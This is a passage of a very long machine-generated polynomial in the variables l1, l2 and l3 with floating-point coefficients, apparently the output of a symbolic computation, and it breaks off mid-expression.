1.61032026684862e+21*l1**3*l2**3*l3**11 - 7.41500975270794e+18*l1**3*l2**3*l3**10 - 8.91338462654765e+18*l1**3*l2**3*l3**9 + 6.76304340381717e+17*l1**3*l2**3*l3**8 + 1.26712582722536e+17*l1**3*l2**3*l3**7 - 2.69884101867087e+15*l1**3*l2**3*l3**6 - 369352909729861.0*l1**3*l2**3*l3**5 + 2823382006238.08*l1**3*l2**3*l3**4 + 274707438444.747*l1**3*l2**3*l3**3 - 368094334.392738*l1**3*l2**3*l3**2 - 55214150.1588828*l1**3*l2**3*l3 - 970561.233261321*l1**3*l2**3 + 7.27899896466175e+30*l1**3*l2**2*l3**23 - 2.0493764144681e+31*l1**3*l2**2*l3**22 - 6.1758748382666e+29*l1**3*l2**2*l3**21 - 6.00331468795204e+28*l1**3*l2**2*l3**20 + 8.04097867899831e+27*l1**3*l2**2*l3**19 + 1.3345130651114e+28*l1**3*l2**2*l3**18 + 1.81060425471692e+26*l1**3*l2**2*l3**17 - 1.84665911125957e+26*l1**3*l2**2*l3**16 - 4.83619712208962e+24*l1**3*l2**2*l3**15 + 1.39751922241817e+24*l1**3*l2**2*l3**14 + 5.37824192171807e+22*l1**3*l2**2*l3**13 - 2.04952291382631e+21*l1**3*l2**2*l3**12 - 3.29163146762741e+20*l1**3*l2**2*l3**11 - 2.6241917262785e+19*l1**3*l2**2*l3**10 + 1.16711985927656e+18*l1**3*l2**2*l3**9 + 1.49287509219763e+17*l1**3*l2**2*l3**8 - 2.35557291474068e+15*l1**3*l2**2*l3**7 - 377835742127364.0*l1**3*l2**2*l3**6 + 2197659507558.39*l1**3*l2**2*l3**5 + 309045868250.383*l1**3*l2**2*l3**4 + 1104283003.1771*l1**3*l2**2*l3**3 + 165642450.476623*l1**3*l2**2*l3**2 - 9462972.02429922*l1**3*l2**2*l3 - 2292950.91358024*l1**3*l2**2 - 3.05899679097435e+30*l1**3*l2*l3**24 + 6.17856777582917e+29*l1**3*l2*l3**23 + 2.32123647545477e+29*l1**3*l2*l3**22 + 1.70228305116168e+29*l1**3*l2*l3**21 - 4.4747631057737e+27*l1**3*l2*l3**20 - 6.92977489417366e+27*l1**3*l2*l3**19 - 2.31593525206083e+25*l1**3*l2*l3**18 + 1.03937007192677e+26*l1**3*l2*l3**17 + 1.19656092569525e+24*l1**3*l2*l3**16 - 9.91804317363117e+23*l1**3*l2*l3**15 - 1.4493252945256e+22*l1**3*l2*l3**14 + 5.26665320255722e+21*l1**3*l2*l3**13 + 7.17871998641578e+19*l1**3*l2*l3**12 - 1.85354223972665e+19*l1**3*l2*l3**11 - 6.46236567757316e+16*l1**3*l2*l3**10 + 5.76271988048126e+16*l1**3*l2*l3**9 - 642410091035230.0*l1**3*l2*l3**8 - 111627149590258.0*l1**3*l2*l3**7 + 1480367862730.1*l1**3*l2*l3**6 + 123618347300.159*l1**3*l2*l3**5 - 184047167.19623*l1**3*l2*l3**4 + 110428300.317747*l1**3*l2*l3**3 + 1455841.84989224*l1**3*l2*l3**2 - 655128.832451519*l1**3*l2*l3 - 9553.96213991778*l1**3*l2 + 6.46124734727255e+29*l1**3*l3**25 + 2.40782420675704e+29*l1**3*l3**24 - 4.48886072195926e+28*l1**3*l3**23 - 3.60902206991554e+28*l1**3*l3**22 + 9.64144733159695e+26*l1**3*l3**21 + 1.33050352728829e+27*l1**3*l3**20 + 9.25384491292991e+24*l1**3*l3**19 - 2.07287622373986e+25*l1**3*l3**18 - 4.90823819471978e+23*l1**3*l3**17 + 1.97142753739963e+23*l1**3*l3**16 + 8.37989478331208e+21*l1**3*l3**15 - 7.88390493299815e+20*l1**3*l3**14 - 7.35251318028837e+19*l1**3*l3**13 - 9.15137096717835e+17*l1**3*l3**12 + 3.53203291464153e+17*l1**3*l3**11 + 2.2112263542508e+16*l1**3*l3**10 - 959936036606019.0*l1**3*l3**9 - 121886183220403.0*l1**3*l3**8 + 1068306705063.06*l1**3*l3**7 + 199162892872.468*l1**3*l3**6 + 184047167.196185*l1**3*l3**5 - 13803537.5397318*l1**3*l3**4 - 3154324.00809967*l1**3*l3**3 - 327564.416225737*l1**3*l3**2 + 19107.9242798354*l1**3*l3 + 4299.28296296297*l1**3 + 2.17057528072439e+29*l1**2*l2**26 + 2.14028818378402e+30*l1**2*l2**25*l3 + 1.09033548985225e+29*l1**2*l2**25 - 3.18872652286879e+31*l1**2*l2**24*l3**2 + 8.85897585504934e+29*l1**2*l2**24*l3 - 4.7987210755966e+28*l1**2*l2**24 + 1.75614683759071e+32*l1**2*l2**23*l3**3 - 1.65049534776382e+31*l1**2*l2**23*l3**2 + 1.24954345151011e+29*l1**2*l2**23*l3 - 2.19886732219522e+28*l1**2*l2**23 - 6.10956367330029e+32*l1**2*l2**22*l3**4 + 1.06007868000884e+32*l1**2*l2**22*l3**3 + 4.31781376452818e+29*l1**2*l2**22*l3**2 + 7.72539790761153e+28*l1**2*l2**22*l3 + 2.14213330724483e+27*l1**2*l2**22 + 1.52108867823674e+33*l1**2*l2**21*l3**5 - 4.32222617371051e+32*l1**2*l2**21*l3**4 - 4.07355313048527e+30*l1**2*l2**21*l3**3 + 1.60887135692081e+29*l1**2*l2**21*l3**2 - 7.22229721814163e+27*l1**2*l2**21*l3 + 9.55309564496876e+26*l1**2*l2**21 - 2.87121174209474e+33*l1**2*l2**20*l3**6 + 1.29606816759373e+33*l1**2*l2**20*l3**5 + 1.49936224811968e+31*l1**2*l2**20*l3**4 - 2.34114204281082e+30*l1**2*l2**20*l3**3 + 6.05073980141746e+27*l1**2*l2**20*l3**2 - 4.10025000436417e+27*l1**2*l2**20*l3 - 3.92258424611838e+25*l1**2*l2**20 + 4.17857952077197e+33*l1**2*l2**19*l3**7 - 3.06963513377463e+33*l1**2*l2**19*l3**6 - 3.57568241134725e+31*l1**2*l2**19*l3**5 + 1.06784710646719e+31*l1**2*l2**19*l3**4 + 4.07952458533955e+28*l1**2*l2**19*l3**3 + 5.69722048985416e+27*l1**2*l2**19*l3**2 + 1.02964702119502e+26*l1**2*l2**19*l3 - 1.79355467835938e+25*l1**2*l2**19 - 4.67809451491002e+33*l1**2*l2**18*l3**8 + 5.97765528956592e+33*l1**2*l2**18*l3**7 + 6.17061236010349e+31*l1**2*l2**18*l3**6 - 3.18794691603593e+31*l1**2*l2**18*l3**5 - 1.81979682787575e+29*l1**2*l2**18*l3**4 + 1.94434565297567e+28*l1**2*l2**18*l3**3 - 8.22093585200107e+25*l1**2*l2**18*l3**2 + 6.60767783980538e+25*l1**2*l2**18*l3 + 5.08300423135721e+23*l1**2*l2**18 + 3.92882202370295e+33*l1**2*l2**17*l3**9 - 9.84622012433616e+33*l1**2*l2**17*l3**8 - 7.98194871714456e+31*l1**2*l2**17*l3**7 + 7.2020726709817e+31*l1**2*l2**17*l3**6 + 4.25340869959796e+29*l1**2*l2**17*l3**5 - 1.28030214976958e+29*l1**2*l2**17*l3**4 - 4.77216383137274e+26*l1**2*l2**17*l3**3 - 1.02037683011198e+26*l1**2*l2**17*l3**2 - 9.59450157065821e+23*l1**2*l2**17*l3 + 2.31127686401205e+23*l1**2*l2**17 - 2.50512655352736e+33*l1**2*l2**16*l3**10 + 1.4018525168192e+34*l1**2*l2**16*l3**9 + 7.85141654760245e+31*l1**2*l2**16*l3**8 - 1.3116617096278e+32*l1**2*l2**16*l3**7 - 6.72405704049661e+29*l1**2*l2**16*l3**6 + 3.94277201789199e+29*l1**2*l2**16*l3**5 + 1.78203815940137e+27*l1**2*l2**16*l3**4 - 1.50908676751066e+26*l1**2*l2**16*l3**3 + 8.92358637549181e+23*l1**2*l2**16*l3**2 - 6.94427298621509e+23*l1**2*l2**16*l3 - 4.21735532270256e+21*l1**2*l2**16 + 1.84031467998792e+33*l1**2*l2**15*l3**11 - 1.75966927744337e+34*l1**2*l2**15*l3**10 - 6.17109843040404e+31*l1**2*l2**15*l3**9 + 2.00092206203733e+32*l1**2*l2**15*l3**8 + 7.89017930019053e+29*l1**2*l2**15*l3**7 - 8.52730556344063e+29*l1**2*l2**15*l3**6 - 3.6813568004011e+27*l1**2*l2**15*l3**5 + 1.13250649740791e+27*l1**2*l2**15*l3**4 + 3.67409914573475e+24*l1**2*l2**15*l3**3 + 1.16057826408094e+24*l1**2*l2**15*l3**2 + 3.67119616170204e+21*l1**2*l2**15*l3 - 1.85658806524068e+21*l1**2*l2**15 - 3.18640955995286e+33*l1**2*l2**14*l3**12 + 1.98401534491601e+34*l1**2*l2**14*l3**11 + 5.2012289003294e+31*l1**2*l2**14*l3**10 - 2.62918552167448e+32*l1**2*l2**14*l3**9 - 7.40605251945655e+29*l1**2*l2**14*l3**8 + 1.44876784749148e+30*l1**2*l2**14*l3**7 + 5.08576085754101e+27*l1**2*l2**14*l3**6 - 3.26800145020451e+27*l1**2*l2**14*l3**5 - 1.09101578374229e+25*l1**2*l2**14*l3**4 + 4.85667631197246e+23*l1**2*l2**14*l3**3 - 3.82538985507515e+21*l1**2*l2**14*l3**2 + 3.71075341464308e+21*l1**2*l2**14*l3 + 2.93081775631923e+19*l1**2*l2**14 + 6.35428341657824e+33*l1**2*l2**13*l3**13 - 2.04498281675046e+34*l1**2*l2**13*l3**12 - 7.2114695412207e+31*l1**2*l2**13*l3**11 + 3.04807779182688e+32*l1**2*l2**13*l3**10 + 6.95635396457805e+29*l1**2*l2**13*l3**9 - 2.03802960152389e+30*l1**2*l2**13*l3**8 - 5.66524893098635e+27*l1**2*l2**13*l3**7 + 6.39179163822101e+27*l1**2*l2**13*l3**6 + 2.12576746795622e+25*l1**2*l2**13*l3**5 - 5.78762383874662e+24*l1**2*l2**13*l3**4 - 2.59937783753859e+22*l1**2*l2**13*l3**3 - 5.96511792404458e+21*l1**2*l2**13*l3**2 - 5.99994570927217e+18*l1**2*l2**13*l3 + 1.13517625551092e+19*l1**2*l2**13 - 9.66945352132346e+33*l1**2*l2**12*l3**14 + 1.95194448940137e+34*l1**2*l2**12*l3**13 + 1.21576566383126e+32*l1**2*l2**12*l3**12 - 3.18212597785078e+32*l1**2*l2**12*l3**11 - 8.63343183016594e+29*l1**2*l2**12*l3**10 + 2.46226723448971e+30*l1**2*l2**12*l3**9 + 5.76130171566501e+27*l1**2*l2**12*l3**8 - 9.80074713280776e+27*l1**2*l2**12*l3**7 - 2.63481475219563e+25*l1**2*l2**12*l3**6 + 1.62179800103885e+25*l1**2*l2**12*l3**5 + 4.54067701095449e+22*l1**2*l2**12*l3**4 - 3.95461940175939e+21*l1**2*l2**12*l3**3 + 4.1498323557974e+19*l1**2*l2**12*l3**2 - 1.21729299922899e+19*l1**2*l2**12*l3 - 1.74331418361127e+17*l1**2*l2**12 + 1.1142693634244e+34*l1**2*l2**11*l3**15 - 1.73365932433295e+34*l1**2*l2**11*l3**14 - 1.71647957433548e+32*l1**2*l2**11*l3**13 + 3.0366712220204e+32*l1**2*l2**11*l3**12 + 1.26574940289999e+30*l1**2*l2**11*l3**11 - 2.62246499895878e+30*l1**2*l2**11*l3**10 - 6.89898468444677e+27*l1**2*l2**11*l3**9 + 1.24114967200664e+28*l1**2*l2**11*l3**8 + 3.20493303308775e+25*l1**2*l2**11*l3**7 - 2.84165235123639e+25*l1**2*l2**11*l3**6 - 9.30491643209743e+22*l1**2*l2**11*l3**5 + 2.13030174670779e+22*l1**2*l2**11*l3**4 + 1.08707683596553e+20*l1**2*l2**11*l3**3 + 2.57702244448675e+19*l1**2*l2**11*l3**2 + 7.80807569281499e+15*l1**2*l2**11*l3 - 5.82774355857546e+16*l1**2*l2**11 - 9.99618567526636e+33*l1**2*l2**10*l3**16 + 1.42413079671561e+34*l1**2*l2**10*l3**15 + 1.88745381646644e+32*l1**2*l2**10*l3**14 - 2.66188105639092e+32*l1**2*l2**10*l3**13 - 1.64420419499421e+30*l1**2*l2**10*l3**12 + 2.50786394846244e+30*l1**2*l2**10*l3**11 + 8.92570857107605e+27*l1**2*l2**10*l3**10 - 1.35705300931384e+28*l1**2*l2**10*l3**9 - 3.56437234205628e+25*l1**2*l2**10*l3**8 + 3.95160504524226e+25*l1**2*l2**10*l3**7 + 9.77840871015364e+22*l1**2*l2**10*l3**6 - 5.44218769577075e+22*l1**2*l2**10*l3**5 - 6.443454834485e+19*l1**2*l2**10*l3**4 + 1.76721350524239e+19*l1**2*l2**10*l3**3 - 3.32130466295508e+17*l1**2*l2**10*l3**2 + 4.28923603447365e+16*l1**2*l2**10*l3 + 478100897521338.0*l1**2*l2**10 + 7.0231941439036e+33*l1**2*l2**9*l3**17 - 1.06623907552651e+34*l1**2*l2**9*l3**16 - 1.61318689711086e+32*l1**2*l2**9*l3**15 + 2.12864109810417e+32*l1**2*l2**9*l3**14 + 1.70184944339071e+30*l1**2*l2**9*l3**13 - 2.16439434375123e+30*l1**2*l2**9*l3**12 - 1.06910324014022e+28*l1**2*l2**9*l3**11 + 1.30314217227845e+28*l1**2*l2**9*l3**10 + 4.46630732985361e+25*l1**2*l2**9*l3**9 - 4.46315903909503e+25*l1**2*l2**9*l3**8 - 1.43266716179746e+23*l1**2*l2**9*l3**7 + 7.83135628548999e+22*l1**2*l2**9*l3**6 + 2.99157452346265e+20*l1**2*l2**9*l3**5 - 3.26663812244005e+19*l1**2*l2**9*l3**4 - 3.55188716422993e+17*l1**2*l2**9*l3**3 - 1.34156075155703e+17*l1**2*l2**9*l3**2 + 201495160840197.0*l1**2*l2**9*l3 + 137483053563278.0*l1**2*l2**9 - 3.79355984876739e+33*l1**2*l2**8*l3**18 + 7.13054877814843e+33*l1**2*l2**8*l3**17 + 1.06824578921848e+32*l1**2*l2**8*l3**16 - 1.52580825254639e+32*l1**2*l2**8*l3**15 - 1.3621052022533e+30*l1**2*l2**8*l3**14 + 1.67189972843809e+30*l1**2*l2**8*l3**13 + 1.0164660863932e+28*l1**2*l2**8*l3**12 - 1.11164579512551e+28*l1**2*l2**8*l3**11 - 4.62473487470449e+25*l1**2*l2**8*l3**10 + 4.39278253533684e+25*l1**2*l2**8*l3**9 + 1.39776931451933e+23*l1**2*l2**8*l3**8 - 9.98886203718664e+22*l1**2*l2**8*l3**7 - 1.94636829672152e+20*l1**2*l2**8*l3**6 + 1.11898661324462e+20*l1**2*l2**8*l3**5 - 1.99067630253218e+17*l1**2*l2**8*l3**4 - 1.49504669729217e+16*l1**2*l2**8*l3**3 + 794408598076611.0*l1**2*l2**8*l3**2 - 44571225082984.2*l1**2*l2**8*l3 - 412061157667.207*l1**2*l2**8 + 1.46400759620317e+33*l1**2*l2**7*l3**19 - 4.16645811979149e+33*l1**2*l2**7*l3**18 - 5.32746361264455e+31*l1**2*l2**7*l3**17 + 9.57000500155429e+31*l1**2*l2**7*l3**16 + 8.28707996321487e+29*l1**2*l2**7*l3**15 - 1.13043533264374e+30*l1**2*l2**7*l3**14 - 7.49397491070353e+27*l1**2*l2**7*l3**13 + 8.27788280087921e+27*l1**2*l2**7*l3**12 + 4.12485181443835e+25*l1**2*l2**7*l3**11 - 3.67150810838279e+25*l1**2*l2**7*l3**10 - 1.59655709632478e+23*l1**2*l2**7*l3**9 + 9.63249541650319e+22*l1**2*l2**7*l3**8 + 4.22921512665234e+20*l1**2*l2**7*l3**7 - 1.12048482480152e+20*l1**2*l2**7*l3**6 - 7.69728680977933e+17*l1**2*l2**7*l3**5 - 6.52937882339492e+16*l1**2*l2**7*l3**4 + 1.04249970721556e+15*l1**2*l2**7*l3**3 + 251493475112860.0*l1**2*l2**7*l3**2 - 457845730741.338*l1**2*l2**7*l3 - 82412231533.4337*l1**2*l2**7 - 3.03562524783538e+32*l1**2*l2**6*l3**20 + 2.07580796396794e+33*l1**2*l2**6*l3**19 + 1.84900472260209e+31*l1**2*l2**6*l3**18 - 5.10118163451969e+31*l1**2*l2**6*l3**17 - 3.6538419435546e+29*l1**2*l2**6*l3**16 + 6.48225461627784e+29*l1**2*l2**6*l3**15 + 3.9551336744309e+27*l1**2*l2**6*l3**14 - 5.25624701213462e+27*l1**2*l2**6*l3**13 - 2.50149849062936e+25*l1**2*l2**6*l3**12 + 2.64736912731008e+25*l1**2*l2**6*l3**11 + 1.02643850290422e+23*l1**2*l2**6*l3**10 - 8.55207443033955e+22*l1**2*l2**6*l3**9 - 2.14120669787009e+20*l1**2*l2**6*l3**8 + 1.58361169077086e+20*l1**2*l2**6*l3**7 - 6.21365029504296e+16*l1**2*l2**6*l3**6 - 1.44610802535687e+17*l1**2*l2**6*l3**5 + 830855924214532.0*l1**2*l2**6*l3**4 + 82293861397653.2*l1**2*l2**6*l3**3 - 686768596112.04*l1**2*l2**6*l3**2 - 20603057883.33*l1**2*l2**6*l3 - 322082542.593271*l1**2*l2**6 - 5.4082659436467e+31*l1**2*l2**5*l3**21 - 8.57398941638932e+32*l1**2*l2**5*l3**20 - 3.31674345069939e+30*l1**2*l2**5*l3**19 + 2.23011422602626e+31*l1**2*l2**5*l3**18 + 1.04912570482353e+29*l1**2*l2**5*l3**17 - 3.01352519324008e+29*l1**2*l2**5*l3**16 - 1.39384450801415e+27*l1**2*l2**5*l3**15 + 2.69667195172543e+27*l1**2*l2**5*l3**14 + 1.07362057569081e+25*l1**2*l2**5*l3**13 - 1.51853188037287e+25*l1**2*l2**5*l3**12 - 6.07269132761096e+22*l1**2*l2**5*l3**11 + 5.66268939106795e+22*l1**2*l2**5*l3**10 + 2.48968806220204e+20*l1**2*l2**5*l3**9 - 1.1261861215504e+20*l1**2*l2**5*l3**8 - 6.82152098836762e+17*l1**2*l2**5*l3**7 + 3.24112060244633e+16*l1**2*l2**5*l3**6 + 1.32560702518997e+15*l1**2*l2**5*l3**5 + 170151768372105.0*l1**2*l2**5*l3**4 - 1098829753779.11*l1**2*l2**5*l3**3 - 123618347300.197*l1**2*l2**5*l3**2 - 276070750.794363*l1**2*l2**5*l3 - 207053063.095747*l1**2*l2**5 + 7.2956568679789e+31*l1**2*l2**4*l3**22 + 2.82601329776077e+32*l1**2*l2**4*l3**21 - 4.20678607555961e+29*l1**2*l2**4*l3**20 - 7.59939845585697e+30*l1**2*l2**4*l3**19 - 1.25048881718997e+28*l1**2*l2**4*l3**18 + 1.0609740977117e+29*l1**2*l2**4*l3**17 + 1.73660272440547e+26*l1**2*l2**4*l3**16 - 1.04524878485829e+27*l1**2*l2**4*l3**15 - 8.26342791836868e+23*l1**2*l2**4*l3**14 + 6.70473887269203e+24*l1**2*l2**4*l3**13 + 2.26393953688109e+20*l1**2*l2**4*l3**12 - 3.2085103661202e+22*l1**2*l2**4*l3**11 + 2.68252804096386e+19*l1**2*l2**4*l3**10 + 9.94052300908343e+19*l1**2*l2**4*l3**9 - 2.45245835924351e+17*l1**2*l2**4*l3**8 - 1.63496872867015e+17*l1**2*l2**4*l3**7 + 806296104701692.0*l1**2*l2**4*l3**6 + 179095097385366.0*l1**2*l2**4*l3**5 - 915691461482.633*l1**2*l2**4*l3**4 - 103015289416.78*l1**2*l2**4*l3**3 + 0.000177734375*l1**2*l2**4*l3**2 + 207053063.095734*l1**2*l2**4*l3 + 3639604.62473035*l1**2*l2**4 - 2.97318334964337e+31*l1**2*l2**3*l3**23 - 7.02039763528611e+31*l1**2*l2**3*l3**22 + 3.92962547683594e+29*l1**2*l2**3*l3**21 + 1.84632863526513e+30*l1**2*l2**3*l3**20 - 1.53299201180638e+27*l1**2*l2**3*l3**19 - 2.42648407803506e+28*l1**2*l2**3*l3**18 + 7.17216162935787e+25*l1**2*l2**3*l3**17 + 2.51687703237737e+26*l1**2*l2**3*l3**16 - 1.30783804828217e+24*l1**2*l2**3*l3**15 - 1.73406793844661e+24*l1**2*l2**3*l3**14 + 1.09288356497842e+22*l1**2*l2**3*l3**13 + 1.02924544870219e+22*l1**2*l2**3*l3**12 - 3.02099942457178e+19*l1**2*l2**3*l3**11 - 3.70880766483693e+19*l1**2*l2**3*l3**10 - 9.10801731145172e+16*l1**2*l2**3*l3**9 + 3.42312179125649e+16*l1**2*l2**3*l3**8 + 758076684624316.0*l1**2*l2**3*l3**7 + 65279723274669.0*l1**2*l2**3*l3**6 - 1098829753779.14*l1**2*l2**3*l3**5 - 103015289416.78*l1**2*l2**3*l3**4 - 368094334.392332*l1**2*l2**3*l3**3 - 331284900.953246*l1**2*l2**3*l3**2 + 5823367.39956877*l1**2*l2**3*l3 + 2620515.32980597*l1**2*l2**3 + 6.09275433449839e+30*l1**2*l2**2*l3**24 + 1.18301400648968e+31*l1**2*l2**2*l3**23 - 4.66981359106039e+28*l1**2*l2**2*l3**22 - 2.55185069769373e+29*l1**2*l2**2*l3**21 - 4.01476414329497e+26*l1**2*l2**2*l3**20 + 1.72416475724787e+27*l1**2*l2**2*l3**19 - 4.65108495825635e+25*l1**2*l2**2*l3**18 - 1.18273750785491e+25*l1**2*l2**2*l3**17 + 1.18005232078041e+24*l1**2*l2**2*l3**16 + 6.73097432056872e+22*l1**2*l2**2*l3**15 - 1.47725141278876e+22*l1**2*l2**2*l3**14 - 1.90221497842973e+21*l1**2*l2**2*l3**13 + 9.94387388750169e+19*l1**2*l2**2*l3**12 + 1.7271816521224e+19*l1**2*l2**2*l3**11 - 3.63593845211351e+17*l1**2*l2**2*l3**10 - 6.11729090441074e+16*l1**2*l2**2*l3**9 + 710688235883898.0*l1**2*l2**2*l3**8 + 133952579508308.0*l1**2*l2**2*l3**7 - 686768596112.062*l1**2*l2**2*l3**6 - 123618347300.153*l1**2*l2**2*l3**5 - 276070750.794262*l1**2*l2**2*l3**4 + 165642450.476572*l1**2*l2**2*l3**3 + 2183762.77483812*l1**2*l2**2*l3**2 - 982693.248677253*l1**2*l2**2*l3 - 14330.9432098765*l1**2*l2**2 - 4.03827959204529e+29*l1**2*l2*l3**25 - 1.06307710260593e+30*l1**2*l2*l3**24 - 2.62204372793147e+28*l1**2*l2*l3**23 - 1.43079913527275e+25*l1**2*l2*l3**22 + 9.52741612793102e+26*l1**2*l2*l3**21 + 8.67049758401261e+26*l1**2*l2*l3**20 + 2.93553746085458e+24*l1**2*l2*l3**19 - 1.60086817456073e+25*l1**2*l2*l3**18 - 2.80360204389063e+23*l1**2*l2*l3**17 + 1.77549591604874e+23*l1**2*l2*l3**16 + 4.48750867433106e+21*l1**2*l2*l3**15 - 8.56823546486594e+20*l1**2*l2*l3**14 - 3.0964431840477e+19*l1**2*l2*l3**13 + 1.75521951244602e+18*l1**2*l2*l3**12 + 8.06698310787038e+16*l1**2*l2*l3**11 - 5.05357783262206e+15*l1**2*l2*l3**10 + 62407486237002.7*l1**2*l2*l3**9 + 8372036219274.15*l1**2*l2*l3**8 - 457845730741.273*l1**2*l2*l3**7 - 20603057883.3733*l1**2*l2*l3**6 - 7.6171875e-5*l1**2*l2*l3**5 - 165642450.476648*l1**2*l2*l3**4 + 1455841.84989231*l1**2*l2*l3**3 + 1965386.49735449*l1**2*l2*l3**2 - 28661.8864197531*l1**2*l2*l3 - 12897.8488888889*l1**2*l2 - 5.55263443906238e+28*l1**2*l3**26 + 1.36291936231527e+28*l1**2*l3**25 + 8.01138361624685e+27*l1**2*l3**24 + 4.70804217777474e+27*l1**2*l3**23 - 2.44889814558781e+26*l1**2*l3**22 - 2.31360016203148e+26*l1**2*l3**21 - 1.63012058090929e+23*l1**2*l3**20 + 4.11552465567385e+24*l1**2*l3**19 + 8.06262066955987e+22*l1**2*l3**18 - 4.52339913426331e+22*l1**2*l3**17 - 1.76219970217265e+21*l1**2*l3**16 + 2.14799668425736e+20*l1**2*l3**15 + 1.80034012788831e+19*l1**2*l3**14 + 7.61685982851856e+16*l1**2*l3**13 - 9.81184205465821e+16*l1**2*l3**12 - 5.5712011631729e+15*l1**2*l3**11 + 308205730020471.0*l1**2*l3**10 + 39698501493548.7*l1**2*l3**9 - 412061157667.18*l1**2*l3**8 - 82412231533.4351*l1**2*l3**7 - 46011791.7990606*l1**2*l3**6 + 41410612.6191494*l1**2*l3**5 + 1455841.84989214*l1**2*l3**4 - 327564.416225746*l1**2*l3**3 - 14330.9432098765*l1**2*l3**2 - 6.3058299322923e-12*l1**2*l3 + 3.02870969403397e+28*l1*l2**27 - 1.1761489311832e+30*l1*l2**26*l3 + 1.13576613526274e+28*l1*l2**26 + 1.14384269444684e+31*l1*l2**25*l3**2 - 5.13366293138761e+29*l1*l2**25*l3 + 3.49099496157695e+27*l1*l2**25 - 6.17705342098234e+31*l1*l2**24*l3**3 + 5.53118107872959e+30*l1*l2**24*l3**2 + 1.90510543944831e+28*l1*l2**24*l3 + 1.55272603829623e+27*l1*l2**24 + 2.27405619527053e+32*l1*l2**23*l3**4 - 3.32461463114112e+31*l1*l2**23*l3**3 - 3.31193926135492e+29*l1*l2**23*l3**2 + 6.71192152479485e+27*l1*l2**23*l3 - 2.29134546844929e+26*l1*l2**23 - 6.17468093172202e+32*l1*l2**22*l3**5 + 1.38161407290172e+32*l1*l2**22*l3**4 + 1.90809679026743e+30*l1*l2**22*l3**3 - 1.54441076611256e+29*l1*l2**22*l3**2 + 3.40684808159715e+26*l1*l2**22*l3 - 9.67714732176006e+25*l1*l2**22 + 1.27366328763212e+33*l1*l2**21*l3**6 - 4.35021145128338e+32*l1*l2**21*l3**5 - 6.74890610674855e+30*l1*l2**21*l3**4 + 1.02530980468782e+30*l1*l2**21*l3**3 + 4.20260860102963e+27*l1*l2**21*l3**2 + 2.18353281793462e+26*l1*l2**21*l3 + 4.71390426057806e+24*l1*l2**21 - 1.96202337904268e+33*l1*l2**20*l3**7 + 1.09055128541794e+33*l1*l2**20*l3**6 + 1.67315493849243e+31*l1*l2**20*l3**5 - 4.21230545320567e+30*l1*l2**20*l3**4 - 2.94353299736349e+28*l1*l2**20*l3**3 + 1.80754054553283e+27*l1*l2**20*l3**2 - 6.89090485316596e+24*l1*l2**20*l3 + 2.04740995449086e+24*l1*l2**20 + 1.99472839588875e+33*l1*l2**19*l3**8 - 2.23882220582993e+33*l1*l2**19*l3**7 - 2.98775194819747e+31*l1*l2**19*l3**6 + 1.25778333869539e+31*l1*l2**19*l3**5 + 1.00364998113496e+29*l1*l2**19*l3**4 - 1.58484172967883e+28*l1*l2**19*l3**3 - 5.09793386632737e+25*l1*l2**19*l3**2 - 5.07710552262958e+24*l1*l2**19*l3 - 6.90385873561201e+22*l1*l2**19 - 3.39821227670615e+32*l1*l2**18*l3**9 + 3.82278891645461e+33*l1*l2**18*l3**8 + 3.56531213696031e+31*l1*l2**18*l3**7 - 2.92033160052343e+31*l1*l2**18*l3**6 - 2.21184114523101e+29*l1*l2**18*l3**5 + 6.55582538948662e+28*l1*l2**18*l3**4 + 3.380214373628e+26*l1*l2**18*l3**3 - 1.78442759330729e+25*l1*l2**18*l3**2 + 9.66214371349009e+22*l1*l2**18*l3 - 2.97766314539911e+22*l1*l2**18 - 3.8124388058602e+33*l1*l2**17*l3**10 - 5.45752891639008e+33*l1*l2**17*l3**9 - 1.48339090655809e+31*l1*l2**17*l3**8 + 5.45168906677976e+31*l1*l2**17*l3**7 + 3.16441355770776e+29*l1*l2**17*l3**6 - 1.84797628030735e+29*l1*l2**17*l3**5 - 9.9067031388746e+26*l1*l2**17*l3**4 + 1.75090777605903e+26*l1*l2**17*l3**3 + 3.35603867416481e+23*l1*l2**17*l3**2 + 7.37239933694304e+22*l1*l2**17*l3 + 6.22621492727903e+20*l1*l2**17 + 1.02711218455918e+34*l1*l2**16*l3**11 + 6.47409412422473e+33*l1*l2**16*l3**10 - 5.09515788547786e+31*l1*l2**16*l3**9 - 8.30568499283749e+31*l1*l2**16*l3**8 - 2.02891619533236e+29*l1*l2**16*l3**7 + 3.92167545490683e+29*l1*l2**16*l3**6 + 1.76388851485741e+27*l1*l2**16*l3**5 - 6.68681466449557e+26*l1*l2**16*l3**4 - 2.3460535515454e+24*l1*l2**16*l3**3 + 6.77733549813534e+22*l1*l2**16*l3**2 - 4.1053937645195e+20*l1*l2**16*l3 + 2.60897303177589e+20*l1*l2**16 - 1.74556957376925e+34*l1*l2**15*l3**12 - 6.21746549442984e+33*l1*l2**15*l3**11 + 1.62659181283752e+32*l1*l2**15*l3**10 + 1.03191687382948e+32*l1*l2**15*l3**9 - 3.35425959529102e+29*l1*l2**15*l3**8 - 6.52745659308974e+29*l1*l2**15*l3**7 - 1.60238589095781e+27*l1*l2**15*l3**6 + 1.68677809367542e+27*l1*l2**15*l3**5 + 5.65520340672336e+24*l1*l2**15*l3**4 - 1.13517673595452e+24*l1*l2**15*l3**3 - 1.92415021795335e+21*l1*l2**15*l3**2 - 4.61180720360064e+20*l1*l2**15*l3 - 4.81942394134603e+18*l1*l2**15 + 2.29212194381049e+34*l1*l2**14*l3**13 + 4.46513962651062e+33*l1*l2**14*l3**12 - 2.93206463775978e+32*l1*l2**14*l3**11 - 1.02203820640932e+32*l1*l2**14*l3**10 + 1.36192306211528e+30*l1*l2**14*l3**9 + 8.61706149331456e+29*l1*l2**14*l3**8 - 9.98068019105674e+26*l1*l2**14*l3**7 - 3.12761141745372e+27*l1*l2**14*l3**6 - 7.24944182622646e+24*l1*l2**14*l3**5 + 4.01407894423084e+24*l1*l2**14*l3**4 + 1.16112376332776e+22*l1*l2**14*l3**3 - 2.51898011942653e+20*l1*l2**14*l3**2 + 1.86531911712146e+18*l1*l2**14*l3 - 1.77145273150263e+18*l1*l2**14 - 2.46206334952769e+34*l1*l2**13*l3**14 - 1.66248449508766e+33*l1*l2**13*l3**13 + 3.95569986802679e+32*l1*l2**13*l3**12 + 7.46579936916071e+31*l1*l2**13*l3**11 - 2.63751024681537e+30*l1*l2**13*l3**10 - 8.87536320843622e+29*l1*l2**13*l3**9 + 6.85376180998034e+27*l1*l2**13*l3**8 + 4.42899665255858e+27*l1*l2**13*l3**7 - 8.64956412675681e+22*l1*l2**13*l3**6 - 8.92437150834772e+24*l1*l2**13*l3**5 - 